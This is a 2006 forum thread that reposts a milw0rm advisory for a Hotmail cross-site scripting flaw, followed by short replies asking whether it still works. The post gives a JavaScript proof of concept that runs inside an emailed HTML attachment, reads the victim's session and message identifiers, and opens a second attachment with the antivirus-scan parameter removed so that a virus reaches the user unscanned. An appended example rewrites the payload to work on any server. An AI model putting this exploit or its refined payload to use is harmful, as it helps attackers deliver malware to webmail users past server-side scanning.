Guest Nemessis Posted October 9, 2006

- HOTMAIL XSS and AV bypass exploit -

To show a practical exploit of the XSS on the Hotmail webmail server, let's do something dirty..., let's force the target user to do something that he would never have allowed: downloading a virus (from Hotmail, of course) :)

I was thinking of some kind of mailbox access, but I needed ActiveX help, and some people could think: "I do not allow ActiveX on my browser..." or "I run Mozilla...", etc.

So the challenge has been to show how, only with JavaScript, an XSS that is theoretically non-exploitable (no access to cookies), and some misconfiguration on the Hotmail webmail, can result in a serious security problem.

1) I know XSS is present (on file attachments) (good)
2) No access to cookies from the injected code (bad)
3) It is not a flaw in input filtering; any script code is allowed (good)
4) I don't know if there is any kind of IP-based session tracking method (bad)
5) Redirecting the output of forced client requests from the XSS code is possible (good)
6) The code to successfully exploit redirection (ActiveX, extended XML, ...) is browser dependent (bad)

So at least the only room I have to play in is JavaScript (exploiting the XSS only with HTML injection doesn't seem to be effective in this case...).

If we take a look at the URL from which attachments are opened, we can see the session identifier and the message identifier. With this info we can build a request to... the same message we have sent? Yes, yes, yes. The same message (same identifier) can have many attachments... We can make a request to the same message but a different attachment...

Why this??? Imagine that we could bypass the antivirus software only with a little modification of the HTTP request... We could not do this in the same attachment in which we send our XSS code, because that one is directly opened by the target's browser, but we could still force a crafted request from our XSS code to open a different attachment (on the same message) without calling the AV software.

How to bypass the AV software...

This is a sample URL to get an attachment from Hotmail:

http://by7fd.bay7.hotmail.msn.com/cg...ox=F000000001&a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXXXX.XX&start=XXXXXXX&len=XXXX&mimepart=3&vscan=scan

"vscan=scan" ... ummm... Remove this, and the antivirus will not be called! Scared? Wait...

Now let's send the target user a mail with two attachments. The first one with this code:

---------------------------------------------------------------------------------------------
<html>
<script>
// The URL the attachment was opened from carries the session identifier (a=)
// and the message identifier (msg=)
str1 = document.URL
// Cut out the value of a= followed by the msg=... parameter
// (the offsets depend on the server name, see the note below)
str2 = str1.slice(55,110)
splitString = str2.split("&")
str3 = splitString[0] + "&" + splitString[1]
// Request the next MIME part of the same message, without vscan=scan
window.open('http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=' + str3 + '&mimepart=4')
</script>
</html>
----------------------------------------------------------------------------------------------

Notice that to make this code work in any environment, you will have to use "splits" and not "slices". This is a proof-of-concept exploit. The only important thing is to extract the user and message identifiers, no matter how you achieve this. If this code doesn't work for you, try changing slice(X,Y).

The second attachment will be a virus test file (for example EICAR).

Once the target opens the first attachment, the AV software will tell him that all is OK, but when he tries to download the file, it will be opened "online", the XSS code will be executed and:
- the session ID and message ID will be retrieved
- a new window will be opened pointing to the second attachment, but without calling the AV software

What does the user see? He will see that he can download the file, without any AV warning; he will see that he is downloading from Hotmail. An experienced user can notice that something strange is happening... but it is still possible to trick him by opening a page similar to the one shown when the AV software is called... As always, now the only limit is the imagination of the attacker.

Conclusions:
- XSS is present on Hotmail
- Hotmail antivirus software can easily be bypassed by exploiting this XSS
- Users of Hotmail are at high risk

XSS Screenshots:
http://www.infohacking.com/INFOHACKI...otmail_XSS.png
http://www.infohacking.com/INFOHACKI...otmail_XSS.png
http://www.infohacking.com/INFOHACKI...otmail_XSS.png
http://www.infohacking.com/INFOHACKI...otmail_XSS.png
http://www.infohacking.com/INFOHACKI...otmail_XSS.png

// Stay well..

Credit - presented by Tontonq on milw0rm.com
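Added example, not part of Nemessis's post or the milw0rm advisory it reposts. The advisory says the proof of concept should use splits rather than fixed slice(X,Y) offsets so that it works on any Hotmail front end; this block does exactly that: it parses the attachment URL's query string by parameter name (curmbox, a, msg, mimepart, vscan, which are the names shown in the advisory), extracts the session and message identifiers wherever they sit, and rebuilds the request for another MIME part of the same message with vscan=scan removed. The sample URL is constructed for the example; its a=, msg=, start= and len= values are placeholders, not real identifiers.

```javascript
// Added example (not the advisory's PoC). Parse the attachment URL by
// parameter name instead of fixed offsets, then forge the request for a
// different MIME part of the same message without the vscan=scan parameter.
// SAMPLE_ATTACHMENT_URL is constructed; identifier values are placeholders.

const SAMPLE_ATTACHMENT_URL =
  'http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg' +
  '?curmbox=F000000001&a=0123456789abcdef0123456789abcdef' +
  '&msg=MSG12345678.90&start=1234567&len=4096&mimepart=3&vscan=scan';

// Split the query string into an ordered list of [name, value] pairs.
// Values are returned verbatim (no decoding): the identifiers are reused as-is.
function parseQuery(url) {
  const q = url.indexOf('?');
  if (q === -1) return [];
  return url.slice(q + 1).split('&').filter(Boolean).map(function (pair) {
    const eq = pair.indexOf('=');
    return eq === -1 ? [pair, ''] : [pair.slice(0, eq), pair.slice(eq + 1)];
  });
}

// Value of the named parameter, or null when it is absent.
function getParam(url, name) {
  const hit = parseQuery(url).find(function (p) { return p[0] === name; });
  return hit ? hit[1] : null;
}

// The two identifiers the PoC needs, wherever they appear in the query.
function extractIds(url) {
  return { a: getParam(url, 'a'), msg: getParam(url, 'msg') };
}

// True when the request would still go through the server-side AV scan.
function isScanned(url) {
  return getParam(url, 'vscan') === 'scan';
}

// Rebuild the request for another MIME part of the same message: keep
// curmbox, a and msg, set the new mimepart, and drop vscan (and start/len,
// which the PoC does not forward either).
function buildUnscannedUrl(url, mimepart) {
  const ids = extractIds(url);
  if (ids.a === null || ids.msg === null) {
    throw new Error('URL carries no a= or msg= parameter');
  }
  const curmbox = getParam(url, 'curmbox');
  const base = url.split('?')[0];
  const keep = [];
  if (curmbox !== null) keep.push('curmbox=' + curmbox);
  keep.push('a=' + ids.a, 'msg=' + ids.msg, 'mimepart=' + String(mimepart));
  return base + '?' + keep.join('&');
}

// Inside the first attachment the PoC would use the page's own URL:
//   window.open(buildUnscannedUrl(document.URL, 4));
// Stand-alone run: show the forged request next to the original.
console.log('original: ' + SAMPLE_ATTACHMENT_URL);
console.log('forged:   ' + buildUnscannedUrl(SAMPLE_ATTACHMENT_URL, 4));
```

Because the parameters are looked up by name, the same code works whether the front end is by7fd.bay7 or another host, and regardless of the order in which the server emits the query parameters; the original slice(55,110) breaks as soon as the host name length changes.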
th0r Posted October 10, 2006
Is it new? Erhmm.. The link is not working, man.. Thanks. Th0R

Guest Nemessis Posted October 10, 2006
It's not the screenshots that are important, the content is.

th0r Posted October 10, 2006
Is this still working?? Because it's old.. Correct me if I'm wrong.. >,< Thanks. Th0R

recuento Posted October 10, 2006
You could easily test it and see if it does.

Guest Nemessis Posted October 10, 2006
It is a new post on milw0rm, th0r. I don't know exactly how old it is.

th0r Posted October 11, 2006
Nemessis wrote: It is a new post on milw0rm, th0r. I don't know exactly how old it is.
Hmm.. I found that website, http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/Hotmail/index.htm, like 9 months / 1 year ago.. It's pretty old though.. As far as I can remember this thing is not working anymore.. But I will try it again.. Anyway, thanks for reporting it, Nemessis xD~~ I don't know if it is new on milw0rm xD~~ Thanks. Th0R